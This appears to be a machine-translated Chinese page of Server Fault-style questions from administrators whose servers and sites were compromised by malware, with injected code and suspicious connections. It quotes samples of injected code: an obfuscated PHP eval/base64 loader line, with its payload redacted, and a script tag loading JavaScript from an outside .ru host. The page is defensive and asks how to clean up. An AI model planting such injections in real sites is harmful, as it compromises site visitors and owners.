Articles of 恶意软件

巧合的是，我注意到，我托pipe的网站上的一些PHP文件已经注入了恶意软件：它们都在原始/正确的代码之前有以下行： <?php eval(gzinflate(base64_decode('[malware code]')));?> 什么是通过我的所有网站进行recursion扫描的最佳方式，并从包含它的任何文件中删除此行（始终是第一行）？ 我有完整的根访问权限。 我不确定这是否是通过现在封闭的洞进入的，还是这个盒子仍然是脆弱的，所以我想做一个干净的扫描，密切监视文件的变化。 问候，Evert

安装葡萄酒是否会造成病毒感染？ 恐怕一个强大的病毒可以绕过酒沙箱并获得对root linux的访问权限。 谢谢。

我做了最多的web开发工作的计算机发现了病毒。 我目前正在从事的一个网站遭到了破坏（我认为通过phpDesigners存储的FTP密码）。 我目前得到： <script type =“text / javascript”src =“http://obscurewax.ru/Queue.js”> </ script> <！ – [一些随机数，这里] – > 正好在每个文件的结尾，该文件的名称以该域上的索引开头。 目前我正在通过名称索引（和其他随机）在服务器上对每个文件进行梳理，并将其删除，但是这是一个漫长的过程，我不确定这是否正确/完整。 处理这种情况的最好方法是什么？ （PC上的病毒已被清除）

可能重复： 根妥协后重新安装？ 有一台服务器在pipe理权限的用户意外地从连接到域的桌面上的USB驱动器中加载病毒之后遭到破坏。 这两个最明显的症状是： 服务器不再响应login尝试 包含用户数据的驱动器的根目录已被填充了随机命名的空文件夹。 （最初是大约一百万个文件夹，我一直在慢慢删除它们。） 我已经从不同的供应商处运行了几次病毒扫描，并且相当有信心，病毒已经被删除，但是损坏已经完成。 我希望两个症状是相关的，一旦目录不存在，服务器将再次开始响应。 驱动器响应非常缓慢。 我一次删除大约20k个文件夹。 不仅如此，Windows资源pipe理器变得无法响应。 如果我清理完高清，事情不能恢复正常，我还能检查其他的东西吗？

可能重复： 我的服务器被黑了应急 我看到奇怪的TCP连接149.9.1.16:ircd它正在运行perl服务，该进程正在创造巨大的负载服务器IPV4 TCP 3u MYIP：58449 – > 149.9.1.16:ircd ESTABLISHED 我可以知道这是恶意软件或任何其他服务运行和吃我的服务器资源我的操作系统的细节是centos5.5

有没有人有经验在Linuxnetworking服务器（特别是CentOS）上运行反病毒软件，你有什么build议？ 我有兴趣把它放在一个Web服务器上，作为检测和防止网站泄密的一种方法（比整个服务器还要妥协，尽pipe这样做也不错）。 尽pipe理想的情况是所有的网站都有完美的安全性，但由于事情并不十分完美，所以最好还是有一个安全措施。 在过去，我看到卡巴斯基在恶意JavaScript文件在Windows机器上运行时就会捕获恶意JavaScript文件，因为它们提供了支持CentOS的Linux产品，但是如果有更好的东西，我也会感兴趣，或者如果有人遇到不好的经历有了它，请分享。 我的意愿是一个大的商业支持，所以他们有资源和人员的时间，以保持最大的威胁，但如果有人已经尝试了ClamAV和一个或多个商业的，并认为ClamAV更好（或有其他的理由说ClamAV更好），我一定有兴趣知道。 谢谢！

有没有人见过这个文件“gvtlsysguard.exe”之前，有什么想法是什么？ 这个周末，我注意到我的一个用户在用户configuration文件的本地设置文件夹中有这个文件，不知何故，他们写了一个registry键到hklm / software / microsoft / windows / current版本/运行在启动时为所有人运行这个程序。 关于这个奇怪的是用户不应该有任何registry权限。 有没有人知道如何到达那里的文件和registry项是如何发生的？

我有一个Linux打包的服务器（是吗？），我为同事运行。 它最近被黑客攻击，我一直在努力在过去的几天摆脱恶意软件。 现在，它将我的大部分网站redirect到http://gator65.hostgator.com/~db905/tds/out.php?s_id=1 。 我能做什么？

我正在计算机上运行smtp4dev，以便在端口25上捕获任何进出计算机的内容，以便进行testing。 每隔一段时间，这封电子邮件就会被困住，我不知道它是从哪里来的。 我在我的机器上运行了Microsoft Security Essentials，但没有识别出病毒或任何东西，所以我不确定发生了什么。 这里是消息的内容： Received: from [125.180.72.4] by 173.162.7.130 SMTP id O2Ncv62Ghig1vR for <[email protected]>; Fri, 24 Jun 2011 20:36:15 +0200 Received: from [125.180.72.4] by 173.162.7.130 SMTP id O2Ncv62Ghig1vR for <[email protected]>; Fri, 24 Jun 2011 20:36:15 +0200 Message-ID: <[email protected]> From: "" <[email protected]> To: <[email protected]> Subject: BC_173.162.7.130 Date: Fri, 24 Jun 11 20:36:15 GMT MIME-Version: […]

可能重复： 我的服务器被黑了应急 我网站的某些页面正在分发有害的软件。 我如何调查和解决这个问题？